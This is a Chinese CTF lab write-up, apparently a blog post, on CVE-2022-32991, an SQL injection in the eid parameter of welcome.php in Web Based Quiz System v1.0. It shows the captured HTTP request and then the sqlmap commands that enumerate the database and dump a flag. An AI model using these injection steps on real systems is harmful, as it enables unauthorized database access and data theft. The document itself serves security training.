CVE-2022-32991

CVE-2022-32991

一、漏洞介绍

该CMS的welcome.php中存在SQL注入攻击。

Web Based Quiz System是一个应用软件。用于一个简单的在线基础的项目。

Web Based Quiz System v1.0版本存在SQL注入漏洞,该漏洞源于welcome.php中的eid参数缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令窃取数据库敏感数据。

二、渗透步骤
1、打开网站
http://eci-2zeh5yvsx4kzl4vnicdo.cloudeci1.ichunqiu.com/

在这里插入图片描述

2、打开注册页面
http://eci-2zeh5yvsx4kzl4vnicdo.cloudeci1.ichunqiu.com/register.php

在这里插入图片描述

3、填写注册信息
用户名:kali
邮箱:123@qq.com
密码:123456
学院名称:kali

在这里插入图片描述

4、打开登录界面
http://eci-2zeh5yvsx4kzl4vnicdo.cloudeci1.ichunqiu.com/login.php

在这里插入图片描述

5、登录账号

在这里插入图片描述

6、查看内容

在这里插入图片描述

7、点击任意一个

在这里插入图片描述

8、截取数据包
GET /welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34 HTTP/1.1
Host: eci-2zeh5yvsx4kzl4vnicdo.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1681027454; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1681028235; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=cc4b2bacb487f8c27cfd634e28143a1682b7c2c3; PHPSESSID=mo7cdaa5a4csrgtgfb1018tsr8
Upgrade-Insecure-Requests: 1

在这里插入图片描述

9、更改eid参数并保存至文档
GET /welcome.php?q=quiz&step=2&eid=*&n=1&t=34 HTTP/1.1
Host: eci-2zeh5yvsx4kzl4vnicdo.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1681027454; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1681028235; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=cc4b2bacb487f8c27cfd634e28143a1682b7c2c3; PHPSESSID=mo7cdaa5a4csrgtgfb1018tsr8
Upgrade-Insecure-Requests: 1

在这里插入图片描述

10、探测数据库
┌──(kali㉿kali)-[~]
└─$ sqlmap -r 1.txt --dbs --batch
数据库名:ctf

在这里插入图片描述

11、探测数据表
┌──(kali㉿kali)-[~]
└─$ sqlmap -r 1.txt -D ctf --tables --batch
数据表名:flag

在这里插入图片描述

12、探测列名
┌──(kali㉿kali)-[~]
└─$ sqlmap -r 1.txt -D ctf -T flag --columns --batch
列名:flag

在这里插入图片描述

13、查看flag值
┌──(kali㉿kali)-[~]
└─$ sqlmap -r 1.txt -D ctf -T flag -C flag --dump --batch 
flag值:flag{448ae86b-de9e-4779-a12c-f71128c76feb}

在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

liebe1*1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值